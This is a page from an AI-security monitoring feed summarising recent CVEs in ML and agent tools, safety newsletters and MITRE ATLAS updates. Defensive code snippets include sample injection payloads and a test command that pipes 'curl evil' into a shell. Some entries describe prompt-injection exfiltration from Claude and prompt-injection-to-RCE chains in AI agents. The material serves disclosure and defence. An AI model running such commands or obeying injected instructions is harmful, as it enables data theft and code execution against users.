aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

3230 items

CVE-2025-11200: MLflow Weak Password Requirements Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected MLflow installations.

critical · vulnerability
security
Oct 29, 2025
CVE-2025-11200

CVE-2025-11200 is a vulnerability in MLflow that allows remote attackers to bypass authentication (gain access without logging in) because the system has weak password requirements (passwords that are too easy to guess or crack). Attackers can exploit this flaw to access MLflow installations without needing valid credentials.

Fix: A patch is available at the following GitHub commit: https://github.com/mlflow/mlflow/commit/1f74f3f24d8273927b8db392c23e108576936c54

NVD/CVE Database

AI Safety Newsletter #65: Measuring Automation and Superintelligence Moratorium Letter

info · news
policy · research
Oct 29, 2025

A new benchmark called the Remote Labor Index (RLI) measures whether AI systems can automate real computer work tasks across different professions, showing that current AI agents can only fully automate 2.5% of projects despite improving over time. Additionally, over 50,000 people, including top scientists and Nobel laureates, signed an open letter calling for a moratorium (temporary ban) on developing superintelligence (a hypothetical AI system far more capable than humans) until it can be proven safe and controllable.

CAIS AI Safety Newsletter

CVE-2025-12058: The Keras.Model.load_model method, including when executed with the intended security mitigation safe_mode=True, is vulnerable to local file disclosure and server-side request forgery.

high · vulnerability
security
Oct 29, 2025
CVE-2025-12058

CVE-2025-12058 is a vulnerability in Keras (a machine learning library) where the load_model method can be tricked into reading files from a computer's local storage or making network requests to external servers, even when the safe_mode=True security flag is enabled. The problem occurs because the StringLookup layer (a component that converts text into numbers) accepts file paths during model loading, and an attacker can craft a malicious .keras file (a model storage format) to exploit this weakness.

NVD/CVE Database

Claude Pirate: Abusing Anthropic's File API For Data Exfiltration

high · news
security
Oct 28, 2025

Anthropic added network request capabilities to Claude's Code Interpreter, which creates a security risk for data exfiltration (unauthorized stealing of sensitive information). An attacker, either controlling the AI model or using indirect prompt injection (hidden malicious instructions in a document the AI processes), could abuse Anthropic's own APIs to steal data that a user has access to, rather than using typical methods like hidden links.

Embrace The Red

CVE-2025-40058: In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Disallow dirty tracking if incoherent page walk is detected.

info · vulnerability
security
Oct 28, 2025
CVE-2025-40058

A Linux kernel vulnerability (CVE-2025-40058) affects Intel VT-d IOMMU (input/output memory management unit, a hardware component that manages memory access for devices) dirty page tracking. Dirty page tracking requires the IOMMU and CPU to keep memory synchronized, but if the IOMMU's page walk (the process of reading memory structure tables) is incoherent (not synchronized), the tracking fails and can cause non-recoverable faults. The fix prevents this misconfiguration by only enabling SSADS (support for dirty tracking) when both ecap_slads and ecap_smpwc hardware capabilities are present.

Fix: Mark SSADS as supported only when both ecap_slads and ecap_smpwc are supported, preventing the IOMMU from being incorrectly configured for dirty page tracking when operating in incoherent mode.

NVD/CVE Database

Lightweight Reparameterizable Integral Neural Networks for Mobile Applications

info · research · Peer-Reviewed
research
Oct 27, 2025

This paper presents RINNs (reparameterizable integral neural networks), a new type of AI model designed to run efficiently on mobile devices with limited computing power. The key innovation is a reparameterization strategy that converts the complex mathematical structure used during training into a simpler feed-forward structure (a straightforward sequence of processing steps) at inference time, allowing these models to achieve high accuracy (79.1%) while running very fast (0.87 milliseconds) on mobile hardware.

IEEE Xplore (Security & AI Journals)

CVE-2025-8709: A SQL injection vulnerability exists in the langchain-ai/langchain repository, specifically in LangGraph's SQLite storage system.

critical · vulnerability
security
Oct 26, 2025
CVE-2025-8709

A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL code into an application) exists in LangGraph's SQLite storage system, specifically in version 2.0.10 of langgraph-checkpoint-sqlite. The vulnerability happens because the code directly combines user input with SQL commands instead of safely separating them, allowing attackers to steal sensitive data like passwords and API keys, and bypass security protections.

NVD/CVE Database
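This class of bug comes down to string interpolation versus parameter binding. A minimal sketch of both patterns using Python's sqlite3 (illustrative only, not LangGraph's actual code; the schema and function names are assumptions):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE checkpoints (thread_id TEXT, data TEXT)")
conn.execute("INSERT INTO checkpoints VALUES ('t1', 'state-a')")

# Vulnerable pattern: attacker-controlled input is spliced into the query,
# so a value like "' OR '1'='1" changes the query's shape and returns all rows.
def load_unsafe(thread_id):
    return conn.execute(
        f"SELECT data FROM checkpoints WHERE thread_id = '{thread_id}'"
    ).fetchall()

# Safe pattern: the driver binds the value; it is always treated as data
# and can never alter the SQL statement itself.
def load_safe(thread_id):
    return conn.execute(
        "SELECT data FROM checkpoints WHERE thread_id = ?", (thread_id,)
    ).fetchall()

print(load_unsafe("' OR '1'='1"))  # leaks every row
print(load_safe("' OR '1'='1"))    # matches nothing
```

The `?` placeholder (SQLAlchemy's bound parameters play the same role) is the whole fix: the injection string is compared literally against thread_id instead of being parsed as SQL.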

LlamaIndex v0.14.6

low · news
security
Oct 25, 2025

LlamaIndex v0.14.6 is a software update released on October 26, 2025, that fixes various bugs across multiple components including support for parallel tool calls, metadata handling, embedding format compatibility, and SQL injection vulnerabilities (using parameterized queries instead of raw SQL string concatenation). The release also adds new features like async support for retrievers and integrations with new services like Helicone.

Fix: The source explicitly mentions one security fix: 'Replace raw SQL string interpolation with proper SQLAlchemy parameterized APIs in PostgresKVStore' (llama-index-storage-kvstore-postgres #20104). Users should update to v0.14.6 to receive this and other bug fixes. No other specific mitigation steps are described in the release notes.

LlamaIndex Security Releases

CVE-2025-62612: FastGPT is an AI Agent building platform. Prior to version 4.11.1, in the workflow file reading node, the network link is not properly verified, creating a risk of SSRF attacks.

medium · vulnerability
security
Oct 22, 2025
CVE-2025-62612

FastGPT, an AI Agent building platform, had a vulnerability in its workflow file reading node where network links were not properly verified, creating a risk of SSRF attacks (server-side request forgery, where an attacker tricks the server into making unwanted requests to other systems). The vulnerability affected versions before 4.11.1.

Fix: Update FastGPT to version 4.11.1 or later, as this issue has been patched in that version.

NVD/CVE Database
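A common defense for this kind of SSRF is to resolve the requested host and refuse anything that lands in a loopback, private, or link-local range (including the cloud metadata address 169.254.169.254). This is a hedged sketch of the general technique, not FastGPT's actual patch; the function name is invented:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_url_allowed(url: str) -> bool:
    """Reject URLs whose host resolves to an internal address."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        # Blocks loopback (127/8), RFC 1918 ranges, and link-local
        # (which covers the 169.254.169.254 metadata endpoint).
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            return False
    return True

print(is_url_allowed("http://127.0.0.1/admin"))   # False
print(is_url_allowed("http://169.254.169.254/"))  # False
```

Note that a robust implementation also has to pin the resolved address when making the request, so a DNS rebinding attack cannot swap in an internal IP after the check.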

CVE-2025-11844: Hugging Face Smolagents version 1.20.0 contains an XPath injection vulnerability in the search_item_ctrl_f function located in its web browser functionality.

high · vulnerability
security
Oct 22, 2025
CVE-2025-11844

Hugging Face Smolagents version 1.20.0 has an XPath injection vulnerability (a security flaw where attackers can inject malicious code into XPath queries, which are used to search and navigate document structures) in its web browser function. The vulnerability exists because user input is directly inserted into XPath queries without being cleaned, allowing attackers to bypass search filters, access unintended data, and disrupt automated web tasks.

Fix: The issue is fixed in version 1.22.0. Users should upgrade Hugging Face Smolagents to version 1.22.0 or later.

NVD/CVE Database
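The underlying defect, splicing raw text into an XPath expression, can be avoided by encoding user input as an XPath string literal before it reaches the query engine. An illustrative helper (this is the generic mitigation for the vulnerability class, not the Smolagents 1.22.0 fix):

```python
def xpath_literal(value: str) -> str:
    """Encode `value` as a safe XPath string literal.

    XPath 1.0 has no escape sequences inside string literals, so input
    containing both quote kinds must be stitched together with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"

# Naive interpolation lets the input close the literal and append predicates:
payload = "x' or '1'='1"
print(f"//a[text()='{payload}']")               # injected: extra predicate runs
print(f"//a[text()={xpath_literal(payload)}]")  # payload stays one plain string
```

With the helper, the attacker's quotes are confined inside a single string literal, so the query structure cannot be altered.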

Prompt injection to RCE in AI agents

high · news
security
Oct 22, 2025

AI agents (software systems that take actions automatically) often execute pre-approved system commands like 'find' and 'grep' for efficiency, but attackers can bypass human approval protections through argument injection attacks (exploiting how command parameters are handled) to achieve remote code execution (RCE, where attackers run unauthorized commands on a system). The article identifies that while these systems block dangerous commands and disable shell operators, they fail to validate command argument flags, creating a common vulnerability across multiple popular AI agent products.

Fix: The article states that 'the impact from this vulnerability class can be limited through improved command execution design using methods like sandboxing (isolating code in a restricted environment) and argument separation.' The text also mentions providing 'actionable recommendations for developers, users, and security engineers,' but the specific recommendations are not detailed in the provided excerpt.

Trail of Bits Blog
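The gap described, validating the binary name but not its flags, fits in a few lines: even with the shell disabled, `find` can launch arbitrary programs through its own `-exec` family of flags. The sketch below shows the missing check; it is illustrative, not any vendor's implementation, and the flag denylist is an assumption:

```python
import shlex

# `find` flags that execute programs or modify the filesystem.
DANGEROUS_FIND_FLAGS = {"-exec", "-execdir", "-ok", "-okdir", "-delete"}

def is_find_invocation_safe(cmdline: str) -> bool:
    """Allow only `find` invocations whose arguments contain no exec-style flags."""
    argv = shlex.split(cmdline)
    if not argv or argv[0] != "find":
        return False
    return not any(arg in DANGEROUS_FIND_FLAGS for arg in argv[1:])

print(is_find_invocation_safe("find . -name '*.py'"))                  # True
print(is_find_invocation_safe("find . -exec sh -c 'curl evil|sh' ;"))  # False
```

A denylist like this is fragile (new flags, GNU long-option aliases), which is why the article's broader recommendations lean on sandboxing and argument separation rather than flag filtering alone.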

CVE-2025-53066: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP).

high · vulnerability
security
Oct 21, 2025
CVE-2025-53066

A vulnerability (CVE-2025-53066) exists in Oracle Java SE and related products, affecting multiple versions including Java 8, 11, 17, 21, and 25. An attacker with network access can exploit this flaw in the JAXP component (a Java library for processing XML data) without needing to log in, potentially gaining unauthorized access to sensitive data. The vulnerability has a CVSS score (a 0-10 rating of how severe a vulnerability is) of 7.5, indicating it is a serious threat.

NVD/CVE Database

CVE-2025-60511: Moodle OpenAI Chat Block plugin 3.0.1 (2025021700) suffers from an Insecure Direct Object Reference (IDOR) vulnerability.

medium · vulnerability
security
Oct 21, 2025
CVE-2025-60511

The Moodle OpenAI Chat Block plugin version 3.0.1 has an IDOR vulnerability (insecure direct object reference, where a user can access resources by directly requesting them without proper permission checks). An authenticated student can bypass validation of the blockId parameter in the plugin's API and impersonate another user's block, such as an administrator's block, allowing them to execute queries with that block's settings, expose sensitive information, and potentially misuse API resources.

NVD/CVE Database
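The general IDOR remedy is a server-side ownership check before honoring a client-supplied identifier. A toy sketch of that check (the data model and names are invented for illustration, not the plugin's code):

```python
# Hypothetical store mapping block ids to their owner and settings.
BLOCKS = {
    1: {"owner": "admin", "api_key": "sk-admin"},
    2: {"owner": "student42", "api_key": "sk-student"},
}

def get_block_settings(block_id: int, current_user: str) -> dict:
    """Return a block's settings only if the requester owns the block.

    The IDOR bug is the absence of the ownership comparison below:
    trusting blockId alone lets any authenticated user borrow another
    user's block (and its API credentials).
    """
    block = BLOCKS.get(block_id)
    if block is None or block["owner"] != current_user:
        raise PermissionError("not authorized for this block")
    return block

print(get_block_settings(2, "student42"))   # student reads their own block
# get_block_settings(1, "student42")        # raises PermissionError
```

Real systems would express the same rule through the platform's capability or ACL layer rather than a literal owner field, but the shape of the check is the same.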

CVE-2025-49655: Deserialization of untrusted data can occur in versions of the Keras framework running versions 3.11.0 up to but not including 3.11.3.

critical · vulnerability
security
Oct 17, 2025
CVE-2025-49655

CVE-2025-49655 is a vulnerability in Keras (a machine learning framework) versions 3.11.0 through 3.11.2 where deserialization (converting saved data back into usable form) of untrusted data can allow malicious code to run on a user's computer when they load a specially crafted Keras file, even if safe mode is enabled. This vulnerability affects both locally stored and remotely downloaded files.

Fix: Update Keras to version 3.11.3 or later. The GitHub pull request at https://github.com/keras-team/keras/pull/21575 contains the fix.

NVD/CVE Database
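A .keras (v3) model is a zip archive whose config.json records which Python modules and classes to instantiate during deserialization. One defensive habit for untrusted models is to inspect those module references before ever calling load_model. This is a cautionary pre-check sketch, not the upstream 3.11.3 fix, and the allowlist prefix is an assumption:

```python
import json
import zipfile

EXPECTED_MODULE_PREFIXES = ("keras",)

def suspicious_modules(path: str) -> set[str]:
    """List module references in a .keras archive outside the expected prefix."""
    with zipfile.ZipFile(path) as archive:
        config = json.loads(archive.read("config.json"))
    found = set()

    def walk(node):
        if isinstance(node, dict):
            module = node.get("module")
            if isinstance(module, str) and not module.startswith(EXPECTED_MODULE_PREFIXES):
                found.add(module)
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(config)
    return found
```

An empty result is necessary but not sufficient (this CVE shows safe_mode itself can be bypassed), so the only robust policy remains treating model files as untrusted code and loading them in a sandbox.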

CVE-2025-62356: A path traversal vulnerability in all versions of the Qodo Gen IDE enables a threat actor to read arbitrary local files.

high · vulnerability
security
Oct 17, 2025
CVE-2025-62356

CVE-2025-62356 is a path traversal vulnerability (a flaw that lets attackers access files outside intended directories) in all versions of Qodo Gen IDE that allows attackers to read any local files on a user's computer, both inside and outside their projects. The vulnerability can be exploited directly or through indirect prompt injection (tricking the AI by hiding malicious instructions in its input).

NVD/CVE Database

CVE-2025-62353: A path traversal vulnerability in all versions of the Windsurf IDE enables a threat actor to read and write arbitrary local files.

critical · vulnerability
security
Oct 17, 2025
CVE-2025-62353

CVE-2025-62353 is a path traversal vulnerability (a flaw that lets attackers access files outside intended directories) in all versions of Windsurf IDE that allows attackers to read and write any files on a user's computer. The vulnerability can be exploited directly or through indirect prompt injection (tricking the AI by hiding malicious instructions in its input).

NVD/CVE Database
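Both IDE bugs share the same root cause, so the canonical containment check applies: resolve the requested path (collapsing `..` segments and following symlinks) and verify the result is still under the workspace before touching it. A minimal sketch; the function and names are assumptions, not either vendor's patch:

```python
from pathlib import Path

def resolve_inside(workspace: str, requested: str) -> Path:
    """Resolve `requested` relative to `workspace`, refusing escapes.

    Resolving AFTER joining is the crucial step: checking the raw string
    for ".." misses tricks like symlinks or "a/../../etc/passwd".
    """
    root = Path(workspace).resolve()
    target = (root / requested).resolve()
    if root != target and root not in target.parents:
        raise PermissionError(f"path escapes workspace: {requested}")
    return target

print(resolve_inside("/tmp/proj", "src/app.py"))   # stays inside the workspace
# resolve_inside("/tmp/proj", "../../etc/passwd")  # raises PermissionError
```

For an AI coding agent, this check belongs in the tool layer itself, since (as both CVEs note) the traversal payload may arrive via indirect prompt injection rather than from the user.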

AI Safety Newsletter #64: New AGI Definition and Senate Bill Would Establish Liability for AI Harms

info · regulatory
policy · industry
Oct 16, 2025

The Senate introduced the AI LEAD Act, which would make AI companies legally liable for harms their systems cause, similar to how traditional product liability (the legal responsibility companies have when their products injure people) works for other products. The act would clarify that AI systems count as products subject to liability and would hold companies accountable if they failed to exercise reasonable care in designing the system, providing warnings, or if they sold a defective system. Additionally, China announced new export controls on rare earth metals (elements essential to semiconductors and AI hardware), which could disrupt global AI supply chains if strictly enforced.

Fix: The AI LEAD Act itself serves as the proposed solution: it would establish federal product liability for AI systems, clarify that AI companies are liable for harms if they fail to exercise reasonable care in design or warnings or breach warranties, allow deployers to be held liable for substantially modifying or dangerously misusing systems, prohibit AI companies from limiting liability through consumer contracts, and require foreign AI developers to register agents for service of process in the US before selling products domestically.

CAIS AI Safety Newsletter

LlamaIndex v0.14.5

info · news
industry
Oct 15, 2025

LlamaIndex v0.14.5 is a release that fixes multiple bugs and adds new features across its ecosystem of AI/LLM tools. Changes include fixing duplicate node positions in documents, improving streaming functionality with AI providers like Anthropic and OpenAI, adding support for new AI models, and enhancing vector storage (database systems that store AI embeddings, which are numerical representations of text meaning) capabilities. The release also introduces new integrations, such as Sglang LLM support and SignNow MCP (model context protocol, a standard for connecting AI tools) tools.

LlamaIndex Security Releases

v5.0.1

info · research · Industry
industry
Oct 15, 2025

N/A -- The provided content is a navigation menu and feature listing from GitHub's website, not a security issue, vulnerability report, or technical problem related to AI/LLMs.

MITRE ATLAS Releases

ATLAS Data v5.0.0

info · research · Industry
security · research
Oct 15, 2025

ATLAS Data v5.0.0 introduces a new "Technique Maturity" field that categorizes AI attack techniques based on evidence level, ranging from feasible (proven in research) to realized (used in actual attacks). The release adds 11 new techniques covering AI agent attacks like context poisoning (injecting false information into an AI system's memory), credential theft from AI configurations, and prompt injection (tricking an AI by hiding malicious instructions in its input), plus updates to existing techniques and case studies.

MITRE ATLAS Releases